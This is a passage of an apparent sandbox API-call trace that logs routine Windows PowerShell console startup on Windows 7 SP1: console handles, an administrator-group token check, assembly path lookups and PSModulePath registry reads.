	[0038.364] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0038.364] GetLastError () returned 0x0
	[0038.367] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x25e784 | out: lpConsoleScreenBufferInfo=0x25e784) returned 1
	[0038.367] GetLastError () returned 0x0
	[0038.372] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0038.372] GetLastError () returned 0x0
	[0038.372] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x25e784 | out: lpConsoleScreenBufferInfo=0x25e784) returned 1
	[0038.373] GetLastError () returned 0x0
	[0038.373] GetVersionExW (in: lpVersionInformation=0x190b70*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x190b70*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0038.373] GetLastError () returned 0x0
	[0038.376] GetCurrentProcess () returned 0xffffffff
	[0038.376] GetLastError () returned 0x3f0
	[0038.378] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x25e794 | out: TokenHandle=0x25e794*=0x324) returned 1
	[0038.378] GetLastError () returned 0x3f0
	[0038.382] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x25e7ec | out: TokenInformation=0x0, ReturnLength=0x25e7ec) returned 0
	[0038.382] GetLastError () returned 0x7a
	[0038.383] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x180500
	[0038.383] GetLastError () returned 0x7a
	[0038.383] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x180500, TokenInformationLength=0x4, ReturnLength=0x25e7ec | out: TokenInformation=0x180500, ReturnLength=0x25e7ec) returned 1
	[0038.383] GetLastError () returned 0x7a
	[0038.386] DuplicateTokenEx (in: hExistingToken=0x324, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x25e7a4 | out: phNewToken=0x25e7a4*=0x31c) returned 1
	[0038.386] GetLastError () returned 0x7f
	[0038.386] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x25e7ec | out: TokenInformation=0x0, ReturnLength=0x25e7ec) returned 0
	[0038.387] GetLastError () returned 0x7a
	[0038.387] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x1804e0
	[0038.387] GetLastError () returned 0x7a
	[0038.387] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x1804e0, TokenInformationLength=0x4, ReturnLength=0x25e7ec | out: TokenInformation=0x1804e0, ReturnLength=0x25e7ec) returned 1
	[0038.387] GetLastError () returned 0x7a
	[0038.388] CheckTokenMembership (in: TokenHandle=0x31c, SidToCheck=0x2062148*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x25e780 | out: IsMember=0x25e780) returned 1
	[0038.388] GetLastError () returned 0x7a
	[0038.388] CloseHandle (hObject=0x31c) returned 1
	[0038.388] GetLastError () returned 0x7a
	[0038.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e2c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0038.388] GetLastError () returned 0x7a
	[0038.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e274, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0038.389] GetLastError () returned 0x7a
	[0038.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e274, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0038.389] GetLastError () returned 0x7a
	[0038.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e274, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0038.389] GetLastError () returned 0x7a
	[0038.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e2c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0038.433] GetLastError () returned 0x7a
	[0038.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e274, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0038.433] GetLastError () returned 0x7a
	[0038.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e274, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0038.433] GetLastError () returned 0x7a
	[0038.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e2c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0038.434] GetLastError () returned 0x7a
	[0038.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e274, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0038.434] GetLastError () returned 0x7a
	[0038.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e274, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0038.434] GetLastError () returned 0x7a
	[0038.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e2d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0038.434] GetLastError () returned 0x7a
	[0038.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e288, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0038.434] GetLastError () returned 0x7a
	[0038.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e288, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0038.434] GetLastError () returned 0x7a
	[0038.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e288, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0038.434] GetLastError () returned 0x7a
	[0038.514] SetConsoleCtrlHandler (HandlerRoutine=0x1f8384a, Add=1) returned 1
	[0038.514] GetLastError () returned 0x7a
	[0038.540] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x31c
	[0038.540] GetLastError () returned 0x0
	[0038.541] CoCreateGuid (in: pguid=0x25e7b8 | out: pguid=0x25e7b8*(Data1=0x23436228, Data2=0xd01, Data3=0x436a, Data4=([0]=0xaa, [1]=0x44, [2]=0xdf, [3]=0x7d, [4]=0x7b, [5]=0x3b, [6]=0x38, [7]=0xe0))) returned 0x0
	[0038.559] WinSqmIsOptedIn () returned 0x0
	[0038.560] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0038.560] GetLastError () returned 0xcb
	[0038.562] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0038.563] GetLastError () returned 0xcb
	[0038.563] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0038.563] GetLastError () returned 0xcb
	[0038.568] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0038.568] GetLastError () returned 0xcb
	[0038.569] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0038.569] GetLastError () returned 0xcb
	[0038.583] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0038.583] GetLastError () returned 0xcb
	[0038.584] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0038.584] GetLastError () returned 0xcb
	[0038.585] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0038.585] GetLastError () returned 0xcb
	[0038.587] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0038.587] GetLastError () returned 0xcb
	[0038.596] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0038.596] GetLastError () returned 0xcb
	[0038.599] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0038.599] GetLastError () returned 0xcb
	[0038.599] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0038.599] GetLastError () returned 0xcb
	[0039.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0039.260] GetLastError () returned 0xcb
	[0039.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0039.260] GetLastError () returned 0xcb
	[0039.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0039.260] GetLastError () returned 0xcb
	[0039.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0039.260] GetLastError () returned 0xcb
	[0039.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0039.333] GetLastError () returned 0x3
	[0039.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0039.333] GetLastError () returned 0x3
	[0039.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0039.334] GetLastError () returned 0x3
	[0039.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0039.334] GetLastError () returned 0x3
	[0039.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0039.334] GetLastError () returned 0x3
	[0039.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0039.334] GetLastError () returned 0x3
	[0039.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0039.334] GetLastError () returned 0x3
	[0039.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0039.334] GetLastError () returned 0x3
	[0039.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0039.334] GetLastError () returned 0x3
	[0039.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0039.334] GetLastError () returned 0x3
	[0039.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0039.335] GetLastError () returned 0x3
	[0039.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0039.335] GetLastError () returned 0x3
	[0039.337] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0039.337] GetLastError () returned 0x3
	[0039.338] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x190b58, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0039.338] GetLastError () returned 0x3
	[0039.338] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e5d0 | out: phkResult=0x25e5d0*=0x328) returned 0x0
	[0039.338] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x25e614, lpData=0x0, lpcbData=0x25e610*=0x0 | out: lpType=0x25e614*=0x2, lpData=0x0, lpcbData=0x25e610*=0x6c) returned 0x0
	[0039.338] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x25e614, lpData=0x190b58, lpcbData=0x25e610*=0x6c | out: lpType=0x25e614*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x25e610*=0x6c) returned 0x0
	[0039.338] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x190b58, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0039.338] GetLastError () returned 0x3
	[0039.338] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x190b58, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0039.338] GetLastError () returned 0x3
	[0039.339] RegCloseKey (hKey=0x328) returned 0x0
	[0039.339] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x190b58, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0039.339] GetLastError () returned 0x3
	[0039.339] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e5d0 | out: phkResult=0x25e5d0*=0x328) returned 0x0
	[0039.339] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x25e614, lpData=0x0, lpcbData=0x25e610*=0x0 | out: lpType=0x25e614*=0x0, lpData=0x0, lpcbData=0x25e610*=0x0) returned 0x2
	[0039.340] RegCloseKey (hKey=0x328) returned 0x0
	[0039.354] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x190b58 | out: pszPath="C:\\Users\\2XC7u663GxWc\\Documents") returned 0x0
	[0039.356] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Documents", nBufferLength=0x105, lpBuffer=0x25e138, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\Documents", lpFilePart=0x0) returned 0x1f
	[0039.356] GetLastError () returned 0x3f0
	[0039.357] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\2XC7u663GxWc\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0039.357] GetLastError () returned 0x3f0
	[0039.366] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0039.366] GetLastError () returned 0xcb
	[0039.367] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0039.367] GetLastError () returned 0xcb
	[0039.370] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0039.370] GetLastError () returned 0xcb
	[0039.370] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0039.370] GetLastError () returned 0xcb
	[0039.377] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e550 | out: phkResult=0x25e550*=0x330) returned 0x0
	[0039.377] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x25e5b8, lpData=0x0, lpcbData=0x25e5b4*=0x0 | out: lpType=0x25e5b8*=0x1, lpData=0x0, lpcbData=0x25e5b4*=0x74) returned 0x0
	[0039.378] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x25e598, lpData=0x0, lpcbData=0x25e594*=0x0 | out: lpType=0x25e598*=0x1, lpData=0x0, lpcbData=0x25e594*=0x74) returned 0x0
	[0039.378] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x25e598, lpData=0x190b58, lpcbData=0x25e594*=0x74 | out: lpType=0x25e598*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x25e594*=0x74) returned 0x0
	[0039.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x25e118, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0039.378] GetLastError () returned 0xcb
	[0039.378] SetErrorMode (uMode=0x1) returned 0x1
	[0039.378] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x25e598 | out: lpFileInformation=0x25e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4f50ebe, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x919bae56, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x919bae56, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0039.378] GetLastError () returned 0xcb
	[0039.378] SetErrorMode (uMode=0x1) returned 0x1
	[0039.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x25e10c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0039.381] GetLastError () returned 0xcb
	[0039.382] SetErrorMode (uMode=0x1) returned 0x1
